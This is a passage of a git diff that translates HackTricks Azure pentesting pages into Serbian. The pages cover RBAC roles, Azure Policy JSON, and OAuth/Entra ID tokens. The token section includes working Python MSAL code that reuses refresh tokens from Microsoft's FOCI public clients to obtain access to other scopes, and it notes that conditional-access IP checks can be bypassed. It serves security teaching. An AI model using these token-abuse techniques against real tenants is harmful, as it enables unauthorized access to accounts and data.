-| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader)                 | Provides permission to backup vault to perform disk backup.      | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
+| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader)                 | Omogućava dozvolu za backup vault za izvršavanje backup-a diska.      | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
 | ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
-| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
+| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Pregledajte virtuelne mašine u portalu i prijavite se kao običan korisnik. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
 
-This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
+Ove uloge se **takođe mogu dodeliti nad logičkim kontejnerima** (kao što su grupe za upravljanje, pretplate i grupe resursa) i principi na koje se to odnosi će ih imati **nad resursima unutar tih kontejnera**.
 
-- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
-- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
+- Pronađite ovde listu sa [**svim ugrađenim ulogama Azure-a**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
+- Pronađite ovde listu sa [**svim ugrađenim ulogama Entra ID**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
 
-### Custom Roles
+### Prilagođene uloge
 
-- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
-- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
-- It’s possible to configure all the granular permissions the custom role will have
-- It’s possible to exclude permissions
-  - A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere
-- It’s possible to use wildcards
-- The used format is a JSON
-  - `actions` are for control actions over the resource
-  - `dataActions` are permissions over the data within the object
-
-Example of permissions JSON for a custom role:
+- Takođe je moguće kreirati [**prilagođene uloge**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
+- One se kreiraju unutar opsega, iako uloga može biti u više opsega (grupe za upravljanje, pretplate i grupe resursa)
+- Moguće je konfigurisati sve granularne dozvole koje će prilagođena uloga imati
+- Moguće je isključiti dozvole
+- Princip sa isključenom dozvolom neće moći da je koristi čak i ako se dozvola dodeljuje negde drugde
+- Moguće je koristiti džoker znakove
+- Korišćeni format je JSON
+- `actions` su za kontrolu radnji nad resursom
+- `dataActions` su dozvole nad podacima unutar objekta
 
+Primer dozvola JSON za prilagođenu ulogu:
 ```json
 {
-  "properties": {
-    "roleName": "",
-    "description": "",
-    "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
-    "permissions": [
-      {
-        "actions": [
-          "Microsoft.DigitalTwins/register/action",
-          "Microsoft.DigitalTwins/unregister/action",
-          "Microsoft.DigitalTwins/operations/read",
-          "Microsoft.DigitalTwins/digitalTwinsInstances/read",
-          "Microsoft.DigitalTwins/digitalTwinsInstances/write",
-          "Microsoft.CostManagement/exports/*"
-        ],
-        "notActions": [
-          "Astronomer.Astro/register/action",
-          "Astronomer.Astro/unregister/action",
-          "Astronomer.Astro/operations/read",
-          "Astronomer.Astro/organizations/read"
-        ],
-        "dataActions": [],
-        "notDataActions": []
-      }
-    ]
-  }
+"properties": {
+"roleName": "",
+"description": "",
+"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
+"permissions": [
+{
+"actions": [
+"Microsoft.DigitalTwins/register/action",
+"Microsoft.DigitalTwins/unregister/action",
+"Microsoft.DigitalTwins/operations/read",
+"Microsoft.DigitalTwins/digitalTwinsInstances/read",
+"Microsoft.DigitalTwins/digitalTwinsInstances/write",
+"Microsoft.CostManagement/exports/*"
+],
+"notActions": [
+"Astronomer.Astro/register/action",
+"Astronomer.Astro/unregister/action",
+"Astronomer.Astro/operations/read",
+"Astronomer.Astro/organizations/read"
+],
+"dataActions": [],
+"notDataActions": []
+}
+]
+}
 }
 ```
-
 ### Permissions order
 
-- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
-- An explicit **deny role assignment takes precedence** over the role granting the permission.
+- Da bi **principal imao pristup resursu**, potrebno je da mu bude dodeljena eksplicitna uloga (na bilo koji način) **koja mu daje tu dozvolu**.
+- Eksplicitna **dodela uloge za odbijanje ima prioritet** nad ulogom koja dodeljuje dozvolu.
 
 
https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

 
 ### Global Administrator
 
-Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
+Global Administrator je uloga iz Entra ID koja dodeljuje **potpunu kontrolu nad Entra ID tenant-om**. Međutim, po defaultu ne dodeljuje nikakve dozvole nad Azure resursima.
 
-Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
-This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
+Korisnici sa ulogom Global Administrator imaju mogućnost da '**povećaju' na User Access Administrator Azure ulogu u Root Management Group**. Tako Global Administratori mogu upravljati pristupom u **svim Azure pretplatama i upravljačkim grupama.**\
+Ovo povećanje može se izvršiti na kraju stranice: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
 
 

 
 ### Azure Policies
 
-**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
+**Azure Policies** su pravila koja pomažu organizacijama da osiguraju da njihovi resursi ispunjavaju specifične standarde i zahteve usklađenosti. Omogućavaju vam da **sprovodite ili proveravate podešavanja na resursima u Azure-u**. Na primer, možete sprečiti kreiranje virtuelnih mašina u neovlašćenoj regiji ili osigurati da svi resursi imaju specifične oznake za praćenje.
 
-Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
+Azure Policies su **proaktivne**: mogu sprečiti kreiranje ili promenu neusklađenih resursa. Takođe su **reaktivne**, omogućavajući vam da pronađete i ispravite postojeće neusklađene resurse.
 
 #### **Key Concepts**
 
-1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
-2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
-3. **Initiatives**: A collection of policies grouped together for broader enforcement.
-4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
+1. **Policy Definition**: Pravilo, napisano u JSON-u, koje specificira šta je dozvoljeno ili zahtevano.
+2. **Policy Assignment**: Primena politike na specifičan opseg (npr. pretplata, grupa resursa).
+3. **Initiatives**: Kolekcija politika grupisanih zajedno za širu primenu.
+4. **Effect**: Specificira šta se dešava kada se politika aktivira (npr. "Deny," "Audit," ili "Append").
 
-**Some examples:**
+**Neki primeri:**
 
-1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
-2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
-3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
-4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
-5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
-6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
+1. **Osiguranje usklađenosti sa specifičnim Azure regijama**: Ova politika osigurava da se svi resursi postavljaju u specifične Azure regije. Na primer, kompanija može želeti da osigura da su svi njeni podaci smešteni u Evropi radi usklađenosti sa GDPR-om.
+2. **Sprovođenje standarda imenovanja**: Politike mogu sprovoditi konvencije imenovanja za Azure resurse. Ovo pomaže u organizaciji i lakom identifikovanju resursa na osnovu njihovih imena, što je korisno u velikim okruženjima.
+3. **Ograničavanje određenih tipova resursa**: Ova politika može ograničiti kreiranje određenih tipova resursa. Na primer, politika može biti postavljena da spreči kreiranje skupih tipova resursa, kao što su određene veličine VM-a, kako bi se kontrolisali troškovi.
+4. **Sprovođenje politika označavanja**: Oznake su parovi ključ-vrednost povezani sa Azure resursima koji se koriste za upravljanje resursima. Politike mogu sprovoditi da određene oznake moraju biti prisutne, ili imati specifične vrednosti, za sve resurse. Ovo je korisno za praćenje troškova, vlasništvo ili kategorizaciju resursa.
+5. **Ograničavanje javnog pristupa resursima**: Politike mogu sprovoditi da određeni resursi, kao što su skladišni nalozi ili baze podataka, nemaju javne krajnje tačke, osiguravajući da su dostupni samo unutar mreže organizacije.
+6. **Automatsko primenjivanje bezbednosnih podešavanja**: Politike se mogu koristiti za automatsko primenjivanje bezbednosnih podešavanja na resurse, kao što je primena specifične grupe bezbednosti mreže na sve VM-ove ili osiguranje da svi skladišni nalozi koriste enkripciju.
 
-Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
+Napomena da se Azure Policies mogu prikačiti na bilo koji nivo Azure hijerarhije, ali se **najčešće koriste u root management group** ili u drugim upravljačkim grupama.
 
 Azure policy json example:
-
 ```json
 {
-  "policyRule": {
-    "if": {
-      "field": "location",
-      "notIn": ["eastus", "westus"]
-    },
-    "then": {
-      "effect": "Deny"
-    }
-  },
-  "parameters": {},
-  "displayName": "Allow resources only in East US and West US",
-  "description": "This policy ensures that resources can only be created in East US or West US.",
-  "mode": "All"
+"policyRule": {
+"if": {
+"field": "location",
+"notIn": ["eastus", "westus"]
+},
+"then": {
+"effect": "Deny"
+}
+},
+"parameters": {},
+"displayName": "Allow resources only in East US and West US",
+"description": "This policy ensures that resources can only be created in East US or West US.",
+"mode": "All"
 }
 ```
+### Nasleđivanje dozvola
 
-### Permissions Inheritance
+U Azure **dozvole se mogu dodeliti bilo kojem delu hijerarhije**. To uključuje upravljačke grupe, pretplate, grupe resursa i pojedinačne resurse. Dozvole se **nasleđuju** od sadržanih **resursa** entiteta gde su dodeljene.
 
-In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
-
-This hierarchical structure allows for efficient and scalable management of access permissions.
+Ova hijerarhijska struktura omogućava efikasno i skalabilno upravljanje dozvolama pristupa.
 
 

 
 ### Azure RBAC vs ABAC
 
-**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
-However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
+**RBAC** (kontrola pristupa zasnovana na ulozi) je ono što smo već videli u prethodnim sekcijama: **Dodeljivanje uloge principalu kako bi mu se omogućio pristup** resursu.\
+Međutim, u nekim slučajevima možda ćete želeti da obezbedite **preciznije upravljanje pristupom** ili **pojednostavite** upravljanje **stotinama** dodela uloga.
 
-Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
-You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
+Azure **ABAC** (kontrola pristupa zasnovana na atributima) se oslanja na Azure RBAC dodavanjem **uslova dodele uloga zasnovanih na atributima** u kontekstu specifičnih akcija. _Uslov dodele uloge_ je **dodatna provera koju možete opcionalno dodati svojoj dodeli uloge** kako biste obezbedili precizniju kontrolu pristupa. Uslov filtrira dozvole dodeljene kao deo definicije uloge i dodele uloge. Na primer, možete **dodati uslov koji zahteva da objekat ima specifičnu oznaku da bi se pročitao objekat**.\
+Ne možete eksplicitno **odbiti** **pristup** specifičnim resursima **korišćenjem uslova**.
 
-## References
+## Reference
 
 - [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
 - [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
@@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
 - [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
index d076e723a..d0fe27a94 100644
--- a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
+++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
@@ -2,100 +2,99 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
+Entra ID je Microsoftova platforma za upravljanje identitetom i pristupom (IAM) zasnovana na oblaku, koja služi kao osnovni sistem za autentifikaciju i autorizaciju za usluge kao što su Microsoft 365 i Azure Resource Manager. Azure AD implementira OAuth 2.0 okvir za autorizaciju i OpenID Connect (OIDC) protokol za autentifikaciju za upravljanje pristupom resursima.
 
 ### OAuth
 
-**Key Participants in OAuth 2.0:**
+**Ključni učesnici u OAuth 2.0:**
 
-1. **Resource Server (RS):** Protects resources owned by the resource owner.
-2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
-3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
-4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
+1. **Server resursa (RS):** Štiti resurse koje poseduje vlasnik resursa.
+2. **Vlasnik resursa (RO):** Obično krajnji korisnik koji poseduje zaštićene resurse.
+3. **Klijentska aplikacija (CA):** Aplikacija koja traži pristup resursima u ime vlasnika resursa.
+4. **Server autorizacije (AS):** Izdaje pristupne tokene klijentskim aplikacijama nakon autentifikacije i autorizacije.
 
-**Scopes and Consent:**
+**Opsezi i saglasnost:**
 
-- **Scopes:** Granular permissions defined on the resource server that specify access levels.
-- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
+- **Opsezi:** Granularne dozvole definisane na serveru resursa koje specificiraju nivoe pristupa.
+- **Saglasnost:** Proces kojim vlasnik resursa daje klijentskoj aplikaciji dozvolu za pristup resursima sa specifičnim opsezima.
 
-**Microsoft 365 Integration:**
+**Integracija sa Microsoft 365:**
 
-- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
-- These applications are deeply integrated and often have interdependent service relationships.
-- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
-- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
-- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
+- Microsoft 365 koristi Azure AD za IAM i sastoji se od više "prvih strana" OAuth aplikacija.
+- Ove aplikacije su duboko integrisane i često imaju međuzavisne odnose usluga.
+- Da bi se pojednostavilo korisničko iskustvo i održala funkcionalnost, Microsoft daje "implicitnu saglasnost" ili "pre-saglasnost" ovim aplikacijama prve strane.
+- **Implicitna saglasnost:** Određene aplikacije automatski **dobijaju pristup specifičnim opsezima bez eksplicitnog odobrenja korisnika ili administratora**.
+- Ovi pre-saglašeni opsezi su obično skriveni i od korisnika i od administratora, čineći ih manje vidljivim u standardnim upravljačkim interfejsima.
 
-**Client Application Types:**
+**Tipovi klijentskih aplikacija:**
 
-1. **Confidential Clients:**
-   - Possess their own credentials (e.g., passwords or certificates).
-   - Can **securely authenticate themselves** to the authorization server.
-2. **Public Clients:**
-   - Do not have unique credentials.
-   - Cannot securely authenticate to the authorization server.
-   - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
+1. **Poverljivi klijenti:**
+- Imaju svoje sopstvene akreditive (npr. lozinke ili sertifikate).
+- Mogu **sigurno da se autentifikuju** na serveru autorizacije.
+2. **Javni klijenti:**
+- Nemaju jedinstvene akreditive.
+- Ne mogu sigurno da se autentifikuju na serveru autorizacije.
+- **Bezbednosna implikacija:** Napadač može da se pretvara da je javna klijentska aplikacija prilikom traženja tokena, jer ne postoji mehanizam za server autorizacije da verifikuje legitimnost aplikacije.
 
-## Authentication Tokens
+## Autentifikacioni Tokeni
 
-There are **three types of tokens** used in OIDC:
+Postoje **tri tipa tokena** koji se koriste u OIDC:
 
-- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
-- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
-- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
-  - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
-  - A refresh token is encrypted and only Microsoft can decrypt it.
-  - Getting a new refresh token doesn't revoke the previous refresh token.
+- [**Pristupni tokeni**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Klijent predstavlja ovaj token serveru resursa da bi **pristupio resursima**. Može se koristiti samo za specifičnu kombinaciju korisnika, klijenta i resursa i **ne može biti opozvan** do isteka - što je 1 sat po defaultu.
+- **ID tokeni**: Klijent prima ovaj **token od servera autorizacije**. Sadrži osnovne informacije o korisniku. **Povezan je sa specifičnom kombinacijom korisnika i klijenta**.
+- **Refresh tokeni**: Dodeljuju se klijentu zajedno sa pristupnim tokenom. Koriste se za **dobijanje novih pristupnih i ID tokena**. Povezani su sa specifičnom kombinacijom korisnika i klijenta i mogu biti opozvani. Podrazumevano vreme isteka je **90 dana** za neaktivne refresh tokene i **nema isteka za aktivne tokene** (iz refresh tokena je moguće dobiti nove refresh tokene).
+- Refresh token treba biti povezan sa **`aud`**, sa nekim **opsezima**, i sa **tenantom** i treba da može da generiše pristupne tokene samo za taj aud, opsege (i ništa više) i tenant. Međutim, ovo nije slučaj sa **FOCI aplikacijama tokena**.
+- Refresh token je enkriptovan i samo Microsoft može da ga dekriptuje.
+- Dobijanje novog refresh tokena ne opoziva prethodni refresh token.
 
 > [!WARNING]
-> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
+> Informacije za **uslovni pristup** su **smeštene** unutar **JWT**. Dakle, ako zatražite **token sa dozvoljene IP adrese**, ta **IP** će biti **smeštena** u tokenu i tada možete koristiti taj token sa **nedozvoljene IP adrese za pristup resursima**.
 
-### Access Tokens "aud"
+### Pristupni Tokeni "aud"
 
-The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
+Polje označeno u "aud" polju je **server resursa** (aplikacija) koji se koristi za obavljanje prijave.
 
-The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
+Komanda `az account get-access-token --resource-type [...]` podržava sledeće tipove i svaki od njih će dodati specifičan "aud" u rezultantnom pristupnom tokenu:
 
 > [!CAUTION]
-> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
+> Imajte na umu da su sledeće samo API-jevi podržani od strane `az account get-access-token`, ali ih ima više.
 
 

 
-aud examples
+aud primeri
 
-- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
-  - `https://graph.windows.net/`
+- **aad-graph (Azure Active Directory Graph API)**: Koristi se za pristup nasleđenom Azure AD Graph API (ukinut), koji omogućava aplikacijama da čitaju i pišu podatke direktorijuma u Azure Active Directory (Azure AD).
+- `https://graph.windows.net/`
 
-* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
-  - `https://management.core.windows.net/ or https://management.azure.com/`
+* **arm (Azure Resource Manager)**: Koristi se za upravljanje Azure resursima putem Azure Resource Manager API. Ovo uključuje operacije kao što su kreiranje, ažuriranje i brisanje resursa kao što su virtuelne mašine, skladišni nalozi i još mnogo toga.
+- `https://management.core.windows.net/ or https://management.azure.com/`
 
-- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
-  - `https://batch.core.windows.net/`
+- **batch (Azure Batch Services)**: Koristi se za pristup Azure Batch, usluzi koja omogućava efikasno izvođenje aplikacija za paralelno i visokoperformantno računanje u oblaku.
+- `https://batch.core.windows.net/`
 
-* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
-  - `https://datalake.azure.net/`
+* **data-lake (Azure Data Lake Storage)**: Koristi se za interakciju sa Azure Data Lake Storage Gen1, koja je skalabilna usluga za skladištenje podataka i analitiku.
+- `https://datalake.azure.net/`
 
-- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
-  - `https://rest.media.azure.net`
+- **media (Azure Media Services)**: Koristi se za pristup Azure Media Services, koje pružaju usluge obrade i isporuke medija zasnovane na oblaku za video i audio sadržaj.
+- `https://rest.media.azure.net`
 
-* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
-  - `https://graph.microsoft.com`
+* **ms-graph (Microsoft Graph API)**: Koristi se za pristup Microsoft Graph API, jedinstvenom kraju za podatke usluga Microsoft 365. Omogućava vam pristup podacima i uvidima iz usluga kao što su Azure AD, Office 365, Enterprise Mobility i Security usluge.
+- `https://graph.microsoft.com`
 
-- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
-  - `https://ossrdbms-aad.database.windows.net`
+- **oss-rdbms (Azure Open Source Relational Databases)**: Koristi se za pristup Azure Database uslugama za open-source relacione baze podataka kao što su MySQL, PostgreSQL i MariaDB.
+- `https://ossrdbms-aad.database.windows.net`
 
 

 
-### Access Tokens Scopes "scp"
+### Pristupni Tokeni Opsezi "scp"
 
-The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
+Opseg pristupnog tokena se čuva unutar scp ključa unutar JWT pristupnog tokena. Ovi opsezi definišu šta pristupni token može da pristupi.
 
-If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
-
-### Get refresh & access token example
+Ako je JWT dozvoljeno da kontaktira određeni API, ali **nema opseg** za izvršenje tražene akcije, **neće moći da izvrši akciju** sa tim JWT-om.
 
+### Primer dobijanja refresh & pristupnog tokena
 ```python
 # Code example from https://github.com/secureworks/family-of-client-ids-research
 import msal
@@ -107,17 +106,17 @@ from typing import Any, Dict, List
 
 # LOGIN VIA CODE FLOW AUTHENTICATION
 azure_cli_client = msal.PublicClientApplication(
-    "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
+"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
 )
 device_flow = azure_cli_client.initiate_device_flow(
-    scopes=["https://graph.microsoft.com/.default"]
+scopes=["https://graph.microsoft.com/.default"]
 )
 print(device_flow["message"])
 
 # Perform device code flow authentication
 
 azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
-    device_flow
+device_flow
 )
 pprint(azure_cli_bearer_tokens_for_graph_api)
 
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api)
 
 # DECODE JWT
 def decode_jwt(base64_blob: str) -> Dict[str, Any]:
-    """Decodes base64 encoded JWT blob"""
-    return jwt.decode(
-        base64_blob, options={"verify_signature": False, "verify_aud": False}
-    )
+"""Decodes base64 encoded JWT blob"""
+return jwt.decode(
+base64_blob, options={"verify_signature": False, "verify_aud": False}
+)
 decoded_access_token = decode_jwt(
-    azure_cli_bearer_tokens_for_graph_api.get("access_token")
+azure_cli_bearer_tokens_for_graph_api.get("access_token")
 )
 pprint(decoded_access_token)
 
 
 # GET NEW ACCESS TOKEN AND REFRESH TOKEN
 new_azure_cli_bearer_tokens_for_graph_api = (
-    # Same client as original authorization
-    azure_cli_client.acquire_token_by_refresh_token(
-        azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
-        # Same scopes as original authorization
-        scopes=["https://graph.microsoft.com/.default"],
-    )
+# Same client as original authorization
+azure_cli_client.acquire_token_by_refresh_token(
+azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
+# Same scopes as original authorization
+scopes=["https://graph.microsoft.com/.default"],
+)
 )
 pprint(new_azure_cli_bearer_tokens_for_graph_api)
 ```
-
 ## FOCI Tokens Privilege Escalation
 
-Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
+Prethodno je pomenuto da bi refresh tokeni trebali biti vezani za **scopes** sa kojima su generisani, za **aplikaciju** i **tenant** za koji su generisani. Ako se bilo koja od ovih granica prekine, moguće je eskalirati privilegije jer će biti moguće generisati access tokene za druge resurse i tenante kojima korisnik ima pristup i sa više scopes nego što je prvobitno bilo predviđeno.
 
-Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
+Štaviše, **to je moguće sa svim refresh tokenima** u [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra računi, Microsoft lični računi i društveni računi kao što su Facebook i Google) jer, kao što [**dokumentacija**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) pominje: "Refresh tokeni su vezani za kombinaciju korisnika i klijenta, ali **nisu vezani za resurs ili tenant**. Klijent može koristiti refresh token da dobije access tokene **kroz bilo koju kombinaciju resursa i tenanta** gde ima dozvolu da to uradi. Refresh tokeni su enkriptovani i samo Microsoft identity platform može da ih pročita."
 
-Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
+Takođe, imajte na umu da su FOCI aplikacije javne aplikacije, tako da **nije potreban nikakav tajni ključ** za autentifikaciju na serveru.
 
-Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
+Poznati FOCI klijenti prijavljeni u [**originalnom istraživanju**](https://github.com/secureworks/family-of-client-ids-research/tree/main) mogu se [**pronaći ovde**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
 
 ### Get different scope
 
-Following with the previous example code, in this code it's requested a new token for a different scope:
-
+U skladu sa prethodnim primerom koda, u ovom kodu se traži novi token za različiti scope:
 ```python
 # Code from https://github.com/secureworks/family-of-client-ids-research
 azure_cli_bearer_tokens_for_outlook_api = (
-    # Same client as original authorization
-    azure_cli_client.acquire_token_by_refresh_token(
-        new_azure_cli_bearer_tokens_for_graph_api.get(
-            "refresh_token"
-        ),
-        # But different scopes than original authorization
-        scopes=[
-            "https://outlook.office.com/.default"
-        ],
-    )
+# Same client as original authorization
+azure_cli_client.acquire_token_by_refresh_token(
+new_azure_cli_bearer_tokens_for_graph_api.get(
+"refresh_token"
+),
+# But different scopes than original authorization
+scopes=[
+"https://outlook.office.com/.default"
+],
+)
 )
 pprint(azure_cli_bearer_tokens_for_outlook_api)
 ```
-
-### Get different client and scopes
-
